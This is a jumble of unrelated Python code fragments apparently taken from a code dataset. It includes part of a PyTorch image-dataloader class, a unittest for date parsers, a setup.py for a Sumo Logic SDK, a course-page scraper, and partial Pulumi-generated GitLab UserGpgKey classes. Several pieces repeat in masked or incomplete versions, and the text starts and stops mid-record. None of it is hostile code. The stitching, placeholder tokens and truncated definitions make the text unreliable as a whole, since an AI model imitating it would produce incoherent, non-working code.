(self.tr_name+'.csv',self.val_name+'.csv',self.test_name+'.csv') \n return ret\n \n def get_data(self, data_dict = None, s = (224,224), dataset = my_image_csv_dataset, bs = 32, balance = False, tfms = None,\n bal_tfms = None, tta = False, num_workers = 4, stats_percentage = 0.6):\n \n self.image_size = s\n if not data_dict:\n data_dict = self.data_dict\n data_dfs,data_dir,minorities,class_diffs,obj,multi_label = (data_dict['data_dfs'],data_dict['data_dir'],data_dict['minorities'],\n data_dict['class_diffs'],data_dict['obj'],data_dict['multi_label'])\n if obj or multi_label:\n balance = False \n if 
tta:\n tta_tfms = {self.tr_name: transforms.Compose( \n [\n# transforms.TenCrop(s),\n transforms.FiveCrop(s[0]), \n transforms.Lambda(lambda crops:torch.stack([transforms.ToTensor()(crop) for crop in crops])),\n transforms.Lambda(lambda crops:torch.stack(\n [transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])(crop) for crop in crops]))\n \n ]),\n self.val_name: transforms.Compose(\n [\n# transforms.TenCrop(s),\n transforms.FiveCrop(s[0]),\n transforms.Lambda(lambda crops:torch.stack([transforms.ToTensor()(crop) for crop in crops])),\n transforms.Lambda(lambda crops:torch.stack(\n [transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])(crop) for crop in crops]))\n ]),\n self.test_name: transforms.Compose(\n [\n# transforms.TenCrop(s),\n transforms.FiveCrop(s[0]),\n transforms.Lambda(lambda crops:torch.stack([transforms.ToTensor()(crop) for crop in crops])),\n transforms.Lambda(lambda crops:torch.stack(\n [transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])(crop) for crop in crops]))\n ])}\n# tta_tfms = {self.tr_name: transforms.Compose([\n# transforms.Resize(s),\n# transforms.ToTensor(),\n# transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])\n# ]),\n# self.val_name: transforms.Compose([\n# transforms.Resize(s), \n# transforms.ToTensor(),\n# transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])\n# ]) }\n \n else:\n tta_tfms = None\n \n if not bal_tfms:\n bal_tfms = { self.tr_name: [transforms.RandomHorizontalFlip()],\n \n self.val_name: None,\n self.test_name: None \n }\n else:\n bal_tfms = {self.tr_name: bal_tfms, self.val_name: None, self.test_name: None}\n if obj:\n resize_transform = transforms.Resize(s)\n else:\n # resize_transform = transforms.RandomResizedCrop(s[0])\n resize_transform = transforms.Resize(s)\n if not tfms:\n tfms = [\n resize_transform,\n transforms.ToTensor(),\n transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])\n ]\n else:\n \n tfms_temp = [\n resize_transform,\n transforms.ToTensor(),\n transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])\n ]\n tfms_temp[1:1] = tfms\n tfms = tfms_temp\n print(tfms)\n \n data_transforms = {\n self.tr_name: tfms,\n self.val_name: [\n # transforms.Resize(s[0]+50),\n # transforms.CenterCrop(s[0]),\n transforms.Resize(s),\n transforms.ToTensor(),\n transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])\n ],\n self.test_name: [\n # transforms.Resize(s[0]+50),\n # transforms.CenterCrop(s[0]),\n transforms.Resize(s),\n transforms.ToTensor(),\n transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])\n ]\n }\n\n temp_tfms = [resize_transform, transforms.ToTensor()]\n temp_dataset = dataset(os.path.join(data_dir,self.tr_name),data_dfs[self.tr_name],temp_tfms)\n self.img_mean,self.img_std = get_img_stats(temp_dataset,stats_percentage)\n data_transforms[self.tr_name][-1].mean,data_transforms[self.tr_name][-1].std = self.img_mean,self.img_std\n data_transforms[self.val_name][-1].mean,data_transforms[self.val_name][-1].std = self.img_mean,self.img_std\n data_transforms[self.test_name][-1].mean,data_transforms[self.test_name][-1].std = self.img_mean,self.img_std\n\n if balance:\n image_datasets = {x: dataset(os.path.join(data_dir,self.tr_name),data_dfs[x],\n data_transforms[x],obj,minorities,class_diffs,bal_tfms[x])\n for x in [self.tr_name, self.val_name, self.test_name]} \n else:\n image_datasets = {x: dataset(os.path.join(data_dir,self.tr_name),data_dfs[x],\n data_transforms[x],obj)\n for x in [self.tr_name, self.val_name, 
self.test_name]}\n \n dataloaders = {x: torch.utils.data.DataLoader(image_datasets[x], batch_size=bs,\n shuffle=True, num_workers=num_workers)\n for x in [self.tr_name, self.val_name, self.test_name]}\n dataset_sizes = {x: len(image_datasets[x]) for x in [self.tr_name, self.val_name, self.test_name]}\n \n self.image_datasets,self.dataloaders,self.dataset_sizes = (image_datasets,dataloaders,\n dataset_sizes)\n \n return image_datasets,dataloaders,dataset_sizes\n\n def imshow(self,inp, title=None):\n \n \"\"\"Imshow for Tensor.\"\"\"\n inp = self.denorm_img(inp)\n plt.imshow(inp)\n if title:\n plt.title(title)\n plt.pause(0.001)\n\n def denorm_img(self,inp,calculate = False):\n\n inp = inp.numpy().transpose((1, 2, 0))\n if calculate:\n mean = np.mean(inp)\n std = np.std(inp)\n else: \n mean = self.img_mean.numpy()\n std = self.img_std.numpy()\n inp = std * inp + mean\n inp = np.clip(inp, 0, 1)\n return inp \n \n def show_data(self,folder_name = 'train', size = (64,64), bs = 5):\n \n self.get_data(size,bs)\n batch = next(iter(self.dataloaders[folder_name]))\n inputs, classes = batch[0],batch[1]\n out = torchvision.utils.make_grid(inputs)\n if self.reg:\n print(classes)\n self.imshow(out, title=[x for x in classes]) \n elif self.multi_label:\n self.imshow(out, title=[self.class_names[np.nonzero(x.type(torch.LongTensor))] for x in classes]) \n else: \n self.imshow(out, title=[self.class_names[x] for x in classes])\n\n # def set_up_object_detection(self,anc_grids,anc_zooms,anc_ratios,num_colr = 12):\n\n # # print('Would you like to give your own values for anchor_grids, anchor_zooms,and anchor_ratios? The default values are: {}, {} and {}'\n # # .format(anc_grids,anc_zooms,anc_ratios))\n # # print('If so, you may call the function \"set_up_object_detection\" with your own paramteres.')\n\n # cmap = get_cmap(num_colr)\n # self.colr_list = [cmap(float(x)) for x in range(num_colr)]\n # self.num_colr = num_colr\n # self.create_anchors(anc_grids,anc_zooms,anc_ratios)\n # self.custom_head = SSD_MultiHead(self.k,self.num_classes,0.45,-4.)\n # self.loss_f = FocalLoss(self.num_classes)\n\n # def create_anchors(self,anc_grids,anc_zooms,anc_ratios):\n \n # anchor_scales = [(anz*i,anz*j) for anz in anc_zooms for (i,j) in anc_ratios]\n # k = len(anchor_scales)\n # anc_offsets = [1/(o*2) for o in anc_grids]\n # anc_x = np.concatenate([np.repeat(np.linspace(ao, 1-ao, ag), ag)\n # for ao,ag in zip(anc_offsets,anc_grids)])\n # anc_y = np.concatenate([np.tile(np.linspace(ao, 1-ao, ag), ag)\n # for ao,ag in zip(anc_offsets,anc_grids)])\n # anc_ctrs = np.repeat(np.stack([anc_x,anc_y], axis=1), k, axis=0)\n # anc_sizes = np.concatenate([np.array([[o/ag,p/ag] for i in range(ag*ag) for o,p in anchor_scales])\n # for ag in anc_grids])\n # grid_sizes = torch.tensor(np.concatenate([np.array(\n # [ 1/ag for i in range(ag*ag) for o,p in anchor_scales])\n # for ag in anc_grids])).float().unsqueeze(1).to(self.device)\n # anchors = torch.tensor(np.concatenate([anc_ctrs, anc_sizes], axis=1)).float().to(self.device)\n # anchor_cnr = hw2corners(anchors[:,:2], anchors[:,2:])\n # self.anchors,self.anchor_cnr,self.grid_sizes,self.k = anchors,anchor_cnr,grid_sizes,k \n\n\n\n\n\n\n\n\n",
"step-ids": [
15,
16,
19,
25,
29
]
}
|
[
15,
16,
19,
25,
29
] |
"""
Tests for parsers.py
@author Kevin Wilson <[email protected]>
"""
import crisis.parsers as undertest
import datetime
import unittest
class TestParsers(unittest.TestCase):
def test_parse_date(self):
date = '8/5/2013 16:14'
self.assertEqual(datetime.datetime(2013, 8, 5, 16, 14),
undertest.parse_date(date))
def test_part_date_short(self):
date = '8/5/13 16:14'
self.assertEqual(datetime.datetime(2013, 8, 5, 16, 14),
undertest.parse_date_short(date))
def test_parse_line(self):
line = ["1","2","3"]
actual = undertest.parse_line(line)
expected = [1,2,3]
self.assertTrue(all(x == y for x, y in zip(expected, actual)))
if __name__ == '__main__':
unittest.main()
|
normal
|
{
"blob_id": "253d37f29e33f61d7e1a5ec2f9a1d6307a2ae108",
"index": 6921,
"step-1": "<mask token>\n\n\nclass TestParsers(unittest.TestCase):\n <mask token>\n\n def test_part_date_short(self):\n date = '8/5/13 16:14'\n self.assertEqual(datetime.datetime(2013, 8, 5, 16, 14), undertest.\n parse_date_short(date))\n\n def test_parse_line(self):\n line = ['1', '2', '3']\n actual = undertest.parse_line(line)\n expected = [1, 2, 3]\n self.assertTrue(all(x == y for x, y in zip(expected, actual)))\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\nclass TestParsers(unittest.TestCase):\n\n def test_parse_date(self):\n date = '8/5/2013 16:14'\n self.assertEqual(datetime.datetime(2013, 8, 5, 16, 14), undertest.\n parse_date(date))\n\n def test_part_date_short(self):\n date = '8/5/13 16:14'\n self.assertEqual(datetime.datetime(2013, 8, 5, 16, 14), undertest.\n parse_date_short(date))\n\n def test_parse_line(self):\n line = ['1', '2', '3']\n actual = undertest.parse_line(line)\n expected = [1, 2, 3]\n self.assertTrue(all(x == y for x, y in zip(expected, actual)))\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\nclass TestParsers(unittest.TestCase):\n\n def test_parse_date(self):\n date = '8/5/2013 16:14'\n self.assertEqual(datetime.datetime(2013, 8, 5, 16, 14), undertest.\n parse_date(date))\n\n def test_part_date_short(self):\n date = '8/5/13 16:14'\n self.assertEqual(datetime.datetime(2013, 8, 5, 16, 14), undertest.\n parse_date_short(date))\n\n def test_parse_line(self):\n line = ['1', '2', '3']\n actual = undertest.parse_line(line)\n expected = [1, 2, 3]\n self.assertTrue(all(x == y for x, y in zip(expected, actual)))\n\n\nif __name__ == '__main__':\n unittest.main()\n",
"step-4": "<mask token>\nimport crisis.parsers as undertest\nimport datetime\nimport unittest\n\n\nclass TestParsers(unittest.TestCase):\n\n def test_parse_date(self):\n date = '8/5/2013 16:14'\n self.assertEqual(datetime.datetime(2013, 8, 5, 16, 14), undertest.\n parse_date(date))\n\n def test_part_date_short(self):\n date = '8/5/13 16:14'\n self.assertEqual(datetime.datetime(2013, 8, 5, 16, 14), undertest.\n parse_date_short(date))\n\n def test_parse_line(self):\n line = ['1', '2', '3']\n actual = undertest.parse_line(line)\n expected = [1, 2, 3]\n self.assertTrue(all(x == y for x, y in zip(expected, actual)))\n\n\nif __name__ == '__main__':\n unittest.main()\n",
"step-5": "\"\"\"\nTests for parsers.py\n\n@author Kevin Wilson <[email protected]>\n\"\"\"\nimport crisis.parsers as undertest\n\nimport datetime\nimport unittest\n\nclass TestParsers(unittest.TestCase):\n\tdef test_parse_date(self):\n\t\tdate = '8/5/2013 16:14'\n\t\tself.assertEqual(datetime.datetime(2013, 8, 5, 16, 14),\n\t\t\t\t\t\tundertest.parse_date(date))\n\n\tdef test_part_date_short(self):\n\t\tdate = '8/5/13 16:14'\n\t\tself.assertEqual(datetime.datetime(2013, 8, 5, 16, 14),\n\t\t\t\t\t\tundertest.parse_date_short(date))\n\n\tdef test_parse_line(self):\n\t\tline = [\"1\",\"2\",\"3\"]\n\t\tactual = undertest.parse_line(line)\n\t\texpected = [1,2,3]\n\t\tself.assertTrue(all(x == y for x, y in zip(expected, actual)))\n\nif __name__ == '__main__':\n\tunittest.main()\n",
"step-ids": [
3,
4,
5,
6,
7
]
}
|
[
3,
4,
5,
6,
7
] |
from setuptools import setup, find_packages
from os.path import join, dirname, abspath
import io
here = abspath(dirname(__file__))
with open(join(here, 'VERSION')) as VERSION_FILE:
__versionstr__ = VERSION_FILE.read().strip()
with open(join(here, 'requirements.txt')) as REQUIREMENTS:
INSTALL_REQUIRES = REQUIREMENTS.read().split('\n')
with io.open(join(here, 'README.md'), encoding='utf-8') as f:
long_description = f.read()
setup(
name="sumologic-sdk",
version=__versionstr__,
packages=find_packages(),
install_requires=INSTALL_REQUIRES,
# PyPI metadata
author="SumoLogic, Yoway Buorn, Melchi Salins",
author_email="[email protected], [email protected], [email protected]",
description="Sumo Logic Python SDK",
license="PSF",
long_description=long_description,
long_description_content_type='text/markdown',
keywords="sumologic python sdk rest api log management analytics logreduce security siem collector forwarder",
url="https://github.com/SumoLogic/sumologic-python-sdk",
zip_safe=True
)
|
normal
|
{
"blob_id": "8d5978bc579115eb3065dce1bae08f1790f2d83c",
"index": 2832,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nwith open(join(here, 'VERSION')) as VERSION_FILE:\n __versionstr__ = VERSION_FILE.read().strip()\nwith open(join(here, 'requirements.txt')) as REQUIREMENTS:\n INSTALL_REQUIRES = REQUIREMENTS.read().split('\\n')\nwith io.open(join(here, 'README.md'), encoding='utf-8') as f:\n long_description = f.read()\nsetup(name='sumologic-sdk', version=__versionstr__, packages=find_packages(\n ), install_requires=INSTALL_REQUIRES, author=\n 'SumoLogic, Yoway Buorn, Melchi Salins', author_email=\n '[email protected], [email protected], [email protected]',\n description='Sumo Logic Python SDK', license='PSF', long_description=\n long_description, long_description_content_type='text/markdown',\n keywords=\n 'sumologic python sdk rest api log management analytics logreduce security siem collector forwarder'\n , url='https://github.com/SumoLogic/sumologic-python-sdk', zip_safe=True)\n",
"step-3": "<mask token>\nhere = abspath(dirname(__file__))\nwith open(join(here, 'VERSION')) as VERSION_FILE:\n __versionstr__ = VERSION_FILE.read().strip()\nwith open(join(here, 'requirements.txt')) as REQUIREMENTS:\n INSTALL_REQUIRES = REQUIREMENTS.read().split('\\n')\nwith io.open(join(here, 'README.md'), encoding='utf-8') as f:\n long_description = f.read()\nsetup(name='sumologic-sdk', version=__versionstr__, packages=find_packages(\n ), install_requires=INSTALL_REQUIRES, author=\n 'SumoLogic, Yoway Buorn, Melchi Salins', author_email=\n '[email protected], [email protected], [email protected]',\n description='Sumo Logic Python SDK', license='PSF', long_description=\n long_description, long_description_content_type='text/markdown',\n keywords=\n 'sumologic python sdk rest api log management analytics logreduce security siem collector forwarder'\n , url='https://github.com/SumoLogic/sumologic-python-sdk', zip_safe=True)\n",
"step-4": "from setuptools import setup, find_packages\nfrom os.path import join, dirname, abspath\nimport io\nhere = abspath(dirname(__file__))\nwith open(join(here, 'VERSION')) as VERSION_FILE:\n __versionstr__ = VERSION_FILE.read().strip()\nwith open(join(here, 'requirements.txt')) as REQUIREMENTS:\n INSTALL_REQUIRES = REQUIREMENTS.read().split('\\n')\nwith io.open(join(here, 'README.md'), encoding='utf-8') as f:\n long_description = f.read()\nsetup(name='sumologic-sdk', version=__versionstr__, packages=find_packages(\n ), install_requires=INSTALL_REQUIRES, author=\n 'SumoLogic, Yoway Buorn, Melchi Salins', author_email=\n '[email protected], [email protected], [email protected]',\n description='Sumo Logic Python SDK', license='PSF', long_description=\n long_description, long_description_content_type='text/markdown',\n keywords=\n 'sumologic python sdk rest api log management analytics logreduce security siem collector forwarder'\n , url='https://github.com/SumoLogic/sumologic-python-sdk', zip_safe=True)\n",
"step-5": "from setuptools import setup, find_packages\nfrom os.path import join, dirname, abspath\nimport io\n\nhere = abspath(dirname(__file__))\n\nwith open(join(here, 'VERSION')) as VERSION_FILE:\n __versionstr__ = VERSION_FILE.read().strip()\n\n\nwith open(join(here, 'requirements.txt')) as REQUIREMENTS:\n INSTALL_REQUIRES = REQUIREMENTS.read().split('\\n')\n\n\nwith io.open(join(here, 'README.md'), encoding='utf-8') as f:\n long_description = f.read()\n\nsetup(\n name=\"sumologic-sdk\",\n version=__versionstr__,\n packages=find_packages(),\n install_requires=INSTALL_REQUIRES,\n # PyPI metadata\n author=\"SumoLogic, Yoway Buorn, Melchi Salins\",\n author_email=\"[email protected], [email protected], [email protected]\",\n description=\"Sumo Logic Python SDK\",\n license=\"PSF\",\n long_description=long_description,\n long_description_content_type='text/markdown',\n keywords=\"sumologic python sdk rest api log management analytics logreduce security siem collector forwarder\",\n url=\"https://github.com/SumoLogic/sumologic-python-sdk\",\n zip_safe=True\n)\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
def parse_detail_for_one_course(page, course, no_info_course):
print(f"{course['name']} is processing**: {course['url']}")
map = {'Locatie': 'location', 'Location': 'location', 'Startdatum':
'effective_start_date', 'Start date': 'effective_start_date',
'Duur': 'duration_desc', 'Wekelijkse studie': 'duration_desc',
'Expensive': 'duration_desc', 'Colleges': 'consecutive_desc',
'Languages': 'languages', 'Languages ': 'languages', 'Talen':
'languages', 'Fee': 'price', 'Fee ': 'price', 'Fairy ': 'price',
'Weekly study': 'second_duration_desc', 'Accreditations ':
'third_duration_desc', 'Investering': 'price'}
info = {'location': '', 'effective_start_date': '', 'duration_desc': '',
'consecutive_desc': '', 'languages': '', 'price': '',
'second_duration_desc': '', 'third_duration_desc': ''}
info_div = page.find('div', attrs={'class': 'program-general-info'})
info_sessions = None
if info_div:
info_sessions = info_div.find_all('div', attrs={'class': 'info-item'})
if not info_sessions:
print(f"-------{course['url']} not div")
no_info_course.append(course)
elif info_sessions:
for info_session in info_sessions:
try:
label = info_session.find('label')
label_text = label.text.strip()
info_attr = map.get(label_text, '')
if 'Wekeli' in label_text:
info_attr = 'duration_desc'
elif 'Permanente educatie' in label_text:
continue
elif 'Accreditaties' in label_text:
continue
elif 'Deadline voor aanmelding' in label_text:
continue
res = info_session.find('div')
res_text = res.text.strip()
info[info_attr] = res_text
except Exception as e:
print(f"{course['url']} has problem of {e}")
continue
detail = {**course, **info}
return detail
<|reserved_special_token_1|>
def parse_detail_for_one_course(page, course, no_info_course):
print(f'{course["name"]} is processing**: {course["url"]}')
map = {"Locatie": "location",
"Location": "location",
"Startdatum": "effective_start_date",
"Start date": "effective_start_date",
"Duur": "duration_desc",
"Wekelijkse studie": "duration_desc",
"Expensive": "duration_desc",
"Colleges": "consecutive_desc",
"Languages": "languages",
"Languages ": "languages",
"Talen": "languages",
"Fee": "price",
"Fee ": "price",
"Fairy ": "price",
"Weekly study": "second_duration_desc",
"Accreditations ": "third_duration_desc",
"Investering": "price"}
info = {"location": "",
"effective_start_date": "",
"duration_desc": "",
"consecutive_desc": "",
"languages": "",
"price": "",
"second_duration_desc": "",
"third_duration_desc": ""}
info_div = page.find('div', attrs={"class": "program-general-info"})
info_sessions = None
if info_div:
info_sessions = info_div.find_all('div', attrs={"class": "info-item"})
if not info_sessions:
print(f'-------{course["url"]} not div')
no_info_course.append(course)
elif info_sessions:
for info_session in info_sessions:
try:
label = info_session.find('label')
label_text = label.text.strip()
info_attr = map.get(label_text, '')
if "Wekeli" in label_text:
info_attr = "duration_desc"
elif "Permanente educatie" in label_text:
continue
elif "Accreditaties" in label_text:
continue
elif "Deadline voor aanmelding" in label_text:
continue
res = info_session.find('div')
res_text = res.text.strip()
info[info_attr] = res_text
except Exception as e:
print(f'{course["url"]} has problem of {e}')
continue
# print(title)
detail = {**course, **info}
# pprint(detail)
return detail
# page = requests.get("https://www.nyenrode.nl/opleidingen/p/collegereeks-excellent-leiderschap")
# page = requests.get("https://www.nyenrode.nl/opleidingen/p/behavioral-and-cultural-governance")
# page = requests.get("https://www.nyenrode.nl/opleidingen/p/advanced-management-program")
# page = requests.get("https://www.nyenrode.nl/opleidingen/p/mba-thesis")
# course = {"name": "",
# "url": ""}
# page = page.text
# page = bs4.BeautifulSoup(page, 'html.parser')
#
# detail = get_detail_for_one_course(page, course, [])
# pprint(detail)
|
flexible
|
{
"blob_id": "0f4fa9f8835ae22032af9faa6c7cb10af3facd79",
"index": 5389,
"step-1": "<mask token>\n",
"step-2": "def parse_detail_for_one_course(page, course, no_info_course):\n print(f\"{course['name']} is processing**: {course['url']}\")\n map = {'Locatie': 'location', 'Location': 'location', 'Startdatum':\n 'effective_start_date', 'Start date': 'effective_start_date',\n 'Duur': 'duration_desc', 'Wekelijkse studie': 'duration_desc',\n 'Expensive': 'duration_desc', 'Colleges': 'consecutive_desc',\n 'Languages': 'languages', 'Languages ': 'languages', 'Talen':\n 'languages', 'Fee': 'price', 'Fee ': 'price', 'Fairy ': 'price',\n 'Weekly study': 'second_duration_desc', 'Accreditations ':\n 'third_duration_desc', 'Investering': 'price'}\n info = {'location': '', 'effective_start_date': '', 'duration_desc': '',\n 'consecutive_desc': '', 'languages': '', 'price': '',\n 'second_duration_desc': '', 'third_duration_desc': ''}\n info_div = page.find('div', attrs={'class': 'program-general-info'})\n info_sessions = None\n if info_div:\n info_sessions = info_div.find_all('div', attrs={'class': 'info-item'})\n if not info_sessions:\n print(f\"-------{course['url']} not div\")\n no_info_course.append(course)\n elif info_sessions:\n for info_session in info_sessions:\n try:\n label = info_session.find('label')\n label_text = label.text.strip()\n info_attr = map.get(label_text, '')\n if 'Wekeli' in label_text:\n info_attr = 'duration_desc'\n elif 'Permanente educatie' in label_text:\n continue\n elif 'Accreditaties' in label_text:\n continue\n elif 'Deadline voor aanmelding' in label_text:\n continue\n res = info_session.find('div')\n res_text = res.text.strip()\n info[info_attr] = res_text\n except Exception as e:\n print(f\"{course['url']} has problem of {e}\")\n continue\n detail = {**course, **info}\n return detail\n",
"step-3": "def parse_detail_for_one_course(page, course, no_info_course):\n print(f'{course[\"name\"]} is processing**: {course[\"url\"]}')\n map = {\"Locatie\": \"location\",\n \"Location\": \"location\",\n \"Startdatum\": \"effective_start_date\",\n \"Start date\": \"effective_start_date\",\n \"Duur\": \"duration_desc\",\n \"Wekelijkse studie\": \"duration_desc\",\n \"Expensive\": \"duration_desc\",\n \"Colleges\": \"consecutive_desc\",\n \"Languages\": \"languages\",\n \"Languages \": \"languages\",\n \"Talen\": \"languages\",\n \"Fee\": \"price\",\n \"Fee \": \"price\",\n \"Fairy \": \"price\",\n \"Weekly study\": \"second_duration_desc\",\n \"Accreditations \": \"third_duration_desc\",\n \"Investering\": \"price\"}\n\n info = {\"location\": \"\",\n \"effective_start_date\": \"\",\n \"duration_desc\": \"\",\n \"consecutive_desc\": \"\",\n \"languages\": \"\",\n \"price\": \"\",\n \"second_duration_desc\": \"\",\n \"third_duration_desc\": \"\"}\n\n info_div = page.find('div', attrs={\"class\": \"program-general-info\"})\n info_sessions = None\n if info_div:\n info_sessions = info_div.find_all('div', attrs={\"class\": \"info-item\"})\n\n if not info_sessions:\n print(f'-------{course[\"url\"]} not div')\n no_info_course.append(course)\n elif info_sessions:\n for info_session in info_sessions:\n try:\n label = info_session.find('label')\n label_text = label.text.strip()\n info_attr = map.get(label_text, '')\n if \"Wekeli\" in label_text:\n info_attr = \"duration_desc\"\n elif \"Permanente educatie\" in label_text:\n continue\n elif \"Accreditaties\" in label_text:\n continue\n elif \"Deadline voor aanmelding\" in label_text:\n continue\n res = info_session.find('div')\n res_text = res.text.strip()\n info[info_attr] = res_text\n except Exception as e:\n print(f'{course[\"url\"]} has problem of {e}')\n continue\n # print(title)\n detail = {**course, **info}\n # pprint(detail)\n return detail\n\n\n# page = requests.get(\"https://www.nyenrode.nl/opleidingen/p/collegereeks-excellent-leiderschap\")\n# page = requests.get(\"https://www.nyenrode.nl/opleidingen/p/behavioral-and-cultural-governance\")\n# page = requests.get(\"https://www.nyenrode.nl/opleidingen/p/advanced-management-program\")\n# page = requests.get(\"https://www.nyenrode.nl/opleidingen/p/mba-thesis\")\n# course = {\"name\": \"\",\n# \"url\": \"\"}\n# page = page.text\n# page = bs4.BeautifulSoup(page, 'html.parser')\n#\n# detail = get_detail_for_one_course(page, course, [])\n# pprint(detail)\n",
"step-4": null,
"step-5": null,
"step-ids": [
0,
1,
2
]
}
|
[
0,
1,
2
] |
<|reserved_special_token_0|>
@pulumi.input_type
class _UserGpgKeyState:
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
class UserGpgKey(pulumi.CustomResource):
@overload
def __init__(__self__, resource_name: str, opts: Optional[pulumi.
ResourceOptions]=None, key: Optional[pulumi.Input[str]]=None,
user_id: Optional[pulumi.Input[int]]=None, __props__=None):
"""
        The `UserGpgKey` resource allows managing the lifecycle of a GPG key assigned to the current user or a specific user.
> Managing GPG keys for arbitrary users requires admin privileges.
**Upstream API**: [GitLab REST API docs](https://docs.gitlab.com/ee/api/users.html#get-a-specific-gpg-key)
## Example Usage
```python
import pulumi
import pulumi_gitlab as gitlab
example_user = gitlab.get_user(username="example-user")
# Manages a GPG key for the specified user. An admin token is required if `user_id` is specified.
example_user_gpg_key = gitlab.UserGpgKey("exampleUserGpgKey",
user_id=example_user.id,
key=""\"-----BEGIN PGP PUBLIC KEY BLOCK-----
...
-----END PGP PUBLIC KEY BLOCK-----""\")
# Manages a GPG key for the current user
example_user_user_gpg_key = gitlab.UserGpgKey("exampleUserUserGpgKey", key=""\"-----BEGIN PGP PUBLIC KEY BLOCK-----
...
-----END PGP PUBLIC KEY BLOCK-----""\")
```
## Import
You can import a GPG key for a specific user using an id made up of `{user-id}:{key}`, e.g.
```sh
$ pulumi import gitlab:index/userGpgKey:UserGpgKey example 42:1
```
Alternatively, you can import a GPG key for the current user using an id made up of `{key}`, e.g.
```sh
$ pulumi import gitlab:index/userGpgKey:UserGpgKey example_user 1
```
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] key: The armored GPG public key.
:param pulumi.Input[int] user_id: The ID of the user to add the GPG key to. If this field is omitted, this resource manages a GPG key for the current user. Otherwise, this resource manages a GPG key for the specified user, and an admin token is required.
"""
...
@overload
def __init__(__self__, resource_name: str, args: UserGpgKeyArgs, opts:
Optional[pulumi.ResourceOptions]=None):
"""
        The `UserGpgKey` resource allows managing the lifecycle of a GPG key assigned to the current user or a specific user.
> Managing GPG keys for arbitrary users requires admin privileges.
**Upstream API**: [GitLab REST API docs](https://docs.gitlab.com/ee/api/users.html#get-a-specific-gpg-key)
## Example Usage
```python
import pulumi
import pulumi_gitlab as gitlab
example_user = gitlab.get_user(username="example-user")
# Manages a GPG key for the specified user. An admin token is required if `user_id` is specified.
example_user_gpg_key = gitlab.UserGpgKey("exampleUserGpgKey",
user_id=example_user.id,
key=""\"-----BEGIN PGP PUBLIC KEY BLOCK-----
...
-----END PGP PUBLIC KEY BLOCK-----""\")
# Manages a GPG key for the current user
example_user_user_gpg_key = gitlab.UserGpgKey("exampleUserUserGpgKey", key=""\"-----BEGIN PGP PUBLIC KEY BLOCK-----
...
-----END PGP PUBLIC KEY BLOCK-----""\")
```
## Import
You can import a GPG key for a specific user using an id made up of `{user-id}:{key}`, e.g.
```sh
$ pulumi import gitlab:index/userGpgKey:UserGpgKey example 42:1
```
Alternatively, you can import a GPG key for the current user using an id made up of `{key}`, e.g.
```sh
$ pulumi import gitlab:index/userGpgKey:UserGpgKey example_user 1
```
:param str resource_name: The name of the resource.
:param UserGpgKeyArgs args: The arguments to use to populate this resource's properties.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
...
def __init__(__self__, resource_name: str, *args, **kwargs):
resource_args, opts = _utilities.get_resource_args_opts(UserGpgKeyArgs,
pulumi.ResourceOptions, *args, **kwargs)
if resource_args is not None:
__self__._internal_init(resource_name, opts, **resource_args.
__dict__)
else:
__self__._internal_init(resource_name, *args, **kwargs)
def _internal_init(__self__, resource_name: str, opts: Optional[pulumi.
ResourceOptions]=None, key: Optional[pulumi.Input[str]]=None,
user_id: Optional[pulumi.Input[int]]=None, __props__=None):
opts = pulumi.ResourceOptions.merge(_utilities.
get_resource_opts_defaults(), opts)
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError(
'Expected resource options to be a ResourceOptions instance')
if opts.id is None:
if __props__ is not None:
raise TypeError(
'__props__ is only valid when passed in combination with a valid opts.id to get an existing resource'
)
__props__ = UserGpgKeyArgs.__new__(UserGpgKeyArgs)
if key is None and not opts.urn:
raise TypeError("Missing required property 'key'")
__props__.__dict__['key'] = key
__props__.__dict__['user_id'] = user_id
__props__.__dict__['created_at'] = None
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import copy
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from . import _utilities
__all__ = ['UserGpgKeyArgs', 'UserGpgKey']
@pulumi.input_type
class UserGpgKeyArgs:
def __init__(__self__, *,
key: pulumi.Input[str],
user_id: Optional[pulumi.Input[int]] = None):
"""
The set of arguments for constructing a UserGpgKey resource.
:param pulumi.Input[str] key: The armored GPG public key.
:param pulumi.Input[int] user_id: The ID of the user to add the GPG key to. If this field is omitted, this resource manages a GPG key for the current user. Otherwise, this resource manages a GPG key for the specified user, and an admin token is required.
"""
pulumi.set(__self__, "key", key)
if user_id is not None:
pulumi.set(__self__, "user_id", user_id)
@property
@pulumi.getter
def key(self) -> pulumi.Input[str]:
"""
The armored GPG public key.
"""
return pulumi.get(self, "key")
@key.setter
def key(self, value: pulumi.Input[str]):
pulumi.set(self, "key", value)
@property
@pulumi.getter(name="userId")
def user_id(self) -> Optional[pulumi.Input[int]]:
"""
The ID of the user to add the GPG key to. If this field is omitted, this resource manages a GPG key for the current user. Otherwise, this resource manages a GPG key for the specified user, and an admin token is required.
"""
return pulumi.get(self, "user_id")
@user_id.setter
def user_id(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "user_id", value)
@pulumi.input_type
class _UserGpgKeyState:
def __init__(__self__, *,
created_at: Optional[pulumi.Input[str]] = None,
key: Optional[pulumi.Input[str]] = None,
